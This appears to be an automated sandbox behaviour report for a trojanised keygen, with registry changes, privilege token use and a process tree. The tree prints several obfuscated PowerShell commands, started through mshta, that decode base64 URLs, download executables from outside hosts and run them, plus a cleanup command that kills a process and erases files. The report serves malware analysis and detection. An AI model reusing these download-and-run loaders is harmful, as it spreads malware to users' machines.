000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchUI.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Processes:
FcIiEO8Bol.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 FcIiEO8Bol.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e FcIiEO8Bol.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe3glqQ5zu6q.exeZfog5KVMBE.exeZfog5KVMBE.exepid process 4088 powershell.exe 4088 powershell.exe 1528 powershell.exe 1528 powershell.exe 3608 powershell.exe 3608 powershell.exe 3712 powershell.exe 3712 powershell.exe 2284 powershell.exe 2284 powershell.exe 2168 powershell.exe 2168 powershell.exe 2284 powershell.exe 2168 powershell.exe 3712 powershell.exe 3608 powershell.exe 4088 powershell.exe 1528 powershell.exe 3712 powershell.exe 2284 powershell.exe 1528 powershell.exe 3608 powershell.exe 2168 powershell.exe 4088 powershell.exe 3560 3glqQ5zu6q.exe 3560 3glqQ5zu6q.exe 3560 3glqQ5zu6q.exe 3560 3glqQ5zu6q.exe 3764 Zfog5KVMBE.exe 3764 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
explorer.exepid process 6088 explorer.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
mkx.exezVhjgfutyFD.exeHuytgfGDFwer.exepid process 5024 mkx.exe 4468 zVhjgfutyFD.exe 4476 HuytgfGDFwer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exe3glqQ5zu6q.exeZfog5KVMBE.exeZfog5KVMBE.exeSmMNW0P9JH.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3608 powershell.exe Token: SeDebugPrivilege 4088 powershell.exe Token: SeDebugPrivilege 2284 powershell.exe Token: SeDebugPrivilege 3712 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 2844 taskkill.exe Token: SeDebugPrivilege 3560 3glqQ5zu6q.exe Token: SeDebugPrivilege 3764 Zfog5KVMBE.exe Token: SeDebugPrivilege 2424 Zfog5KVMBE.exe Token: SeDebugPrivilege 4004 SmMNW0P9JH.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 956 taskkill.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeIncreaseQuotaPrivilege 4780 powershell.exe Token: SeSecurityPrivilege 4780 powershell.exe Token: SeTakeOwnershipPrivilege 4780 powershell.exe Token: SeLoadDriverPrivilege 4780 powershell.exe Token: SeSystemProfilePrivilege 4780 powershell.exe Token: SeSystemtimePrivilege 4780 powershell.exe Token: SeProfSingleProcessPrivilege 4780 powershell.exe Token: SeIncBasePriorityPrivilege 4780 powershell.exe Token: SeCreatePagefilePrivilege 4780 powershell.exe Token: SeBackupPrivilege 4780 powershell.exe Token: SeRestorePrivilege 4780 powershell.exe Token: SeShutdownPrivilege 4780 powershell.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeSystemEnvironmentPrivilege 4780 powershell.exe Token: SeRemoteShutdownPrivilege 4780 powershell.exe Token: SeUndockPrivilege 4780 powershell.exe Token: SeManageVolumePrivilege 4780 powershell.exe Token: 33 4780 powershell.exe Token: 34 4780 powershell.exe Token: 35 4780 powershell.exe Token: 36 4780 powershell.exe Token: SeDebugPrivilege 4580 powershell.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 488 powershell.exe Token: SeDebugPrivilege 508 powershell.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 4660 powershell.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 3948 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeIncreaseQuotaPrivilege 2480 powershell.exe Token: SeSecurityPrivilege 2480 powershell.exe Token: SeTakeOwnershipPrivilege 2480 powershell.exe Token: SeLoadDriverPrivilege 2480 powershell.exe Token: SeSystemProfilePrivilege 2480 powershell.exe Token: SeSystemtimePrivilege 2480 powershell.exe Token: SeProfSingleProcessPrivilege 2480 powershell.exe Token: SeIncBasePriorityPrivilege 2480 powershell.exe Token: SeCreatePagefilePrivilege 2480 powershell.exe Token: SeBackupPrivilege 2480 powershell.exe Token: SeRestorePrivilege 2480 powershell.exe Token: SeShutdownPrivilege 2480 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeSystemEnvironmentPrivilege 2480 powershell.exe Token: SeRemoteShutdownPrivilege 2480 powershell.exe Token: SeUndockPrivilege 2480 powershell.exe Token: SeManageVolumePrivilege 2480 powershell.exe -
Suspicious use of FindShellTrayWindow 49 IoCs
Processes:
Keygen.exeexplorer.exepid process 504 Keygen.exe 504 Keygen.exe 504 Keygen.exe 504 Keygen.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe -
Suspicious use of SendNotifyMessage 38 IoCs
Processes:
explorer.exepid process 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
Keygen.exemkx.exepvr.exezVhjgfutyFD.exeHuytgfGDFwer.exeZfog5KVMBE.exeSearchUI.exeShellExperienceHost.exetdwmwhz8zi.exeSearchUI.exepid process 504 Keygen.exe 5024 mkx.exe 5104 pvr.exe 4468 zVhjgfutyFD.exe 4476 HuytgfGDFwer.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2240 SearchUI.exe 5800 ShellExperienceHost.exe 5800 ShellExperienceHost.exe 3432 tdwmwhz8zi.exe 3432 tdwmwhz8zi.exe 356 SearchUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Keygen.bin.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exepowershell.exemkx.exedescription pid process target process PID 732 wrote to memory of 2744 732 Keygen.bin.exe cmd.exe PID 732 wrote to memory of 2744 732 Keygen.bin.exe cmd.exe PID 732 wrote to memory of 2744 732 Keygen.bin.exe cmd.exe PID 2744 wrote to memory of 504 2744 cmd.exe Keygen.exe PID 2744 wrote to memory of 504 2744 cmd.exe Keygen.exe PID 2744 wrote to memory of 504 2744 cmd.exe Keygen.exe PID 2744 wrote to memory of 2276 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 2276 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 2276 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 920 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 920 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 920 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 1436 2744 cmd.exe timeout.exe PID 2744 wrote to memory of 1436 2744 cmd.exe timeout.exe PID 2744 wrote to memory of 1436 2744 cmd.exe timeout.exe PID 2744 wrote to memory of 2224 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 2224 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 2224 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 1092 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 1092 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 1092 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 3680 2744 cmd.exe timeout.exe PID 2744 wrote to memory of 3680 2744 cmd.exe timeout.exe PID 2744 wrote to memory of 3680 2744 cmd.exe timeout.exe PID 2744 wrote to memory of 1904 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 1904 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 1904 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 584 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 584 2744 cmd.exe mshta.exe PID 2744 wrote to memory of 584 2744 cmd.exe mshta.exe PID 584 wrote to memory of 3712 584 mshta.exe powershell.exe PID 920 wrote to memory of 2168 920 mshta.exe powershell.exe PID 584 wrote to memory of 3712 584 mshta.exe powershell.exe PID 584 wrote to memory of 3712 584 mshta.exe powershell.exe PID 920 wrote to memory of 2168 920 mshta.exe powershell.exe PID 920 wrote to memory of 2168 920 mshta.exe powershell.exe PID 2276 wrote to memory of 1528 2276 mshta.exe powershell.exe PID 2276 wrote to memory of 1528 2276 mshta.exe powershell.exe PID 2276 wrote to memory of 1528 2276 mshta.exe powershell.exe PID 2224 wrote to memory of 3608 2224 mshta.exe powershell.exe PID 2224 wrote to memory of 3608 2224 mshta.exe powershell.exe PID 2224 wrote to memory of 3608 2224 mshta.exe powershell.exe PID 1904 wrote to memory of 4088 1904 mshta.exe powershell.exe PID 1904 wrote to memory of 4088 1904 mshta.exe powershell.exe PID 1904 wrote to memory of 4088 1904 mshta.exe powershell.exe PID 1092 wrote to memory of 2284 1092 mshta.exe powershell.exe PID 1092 wrote to memory of 2284 1092 mshta.exe powershell.exe PID 1092 wrote to memory of 2284 1092 mshta.exe powershell.exe PID 4088 wrote to memory of 5024 4088 powershell.exe mkx.exe PID 4088 wrote to memory of 5024 4088 powershell.exe mkx.exe PID 4088 wrote to memory of 5024 4088 powershell.exe mkx.exe PID 1528 wrote to memory of 5104 1528 powershell.exe pvr.exe PID 1528 wrote to memory of 5104 1528 powershell.exe pvr.exe PID 1528 wrote to memory of 5104 1528 powershell.exe pvr.exe PID 3608 wrote to memory of 5116 3608 powershell.exe txi.exe PID 3608 wrote to memory of 5116 3608 powershell.exe txi.exe PID 3608 wrote to memory of 5116 3608 powershell.exe txi.exe PID 5024 wrote to memory of 4468 5024 mkx.exe zVhjgfutyFD.exe PID 5024 wrote to memory of 4468 5024 mkx.exe zVhjgfutyFD.exe PID 5024 wrote to memory of 4468 5024 mkx.exe zVhjgfutyFD.exe PID 5024 wrote to memory of 4476 5024 mkx.exe HuytgfGDFwer.exe PID 5024 wrote to memory of 4476 5024 mkx.exe HuytgfGDFwer.exe PID 5024 wrote to memory of 4476 5024 mkx.exe HuytgfGDFwer.exe PID 5024 wrote to memory of 4272 5024 mkx.exe mkx.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\790E.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\pvr.exe"C:\Users\Public\pvr.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\txi.exe"C:\Users\Public\txi.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 5044 & erase C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe & RD /S /Q C:\\ProgramData\\135572298009183\\* & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 504410⤵
- Kills process with taskkill
-
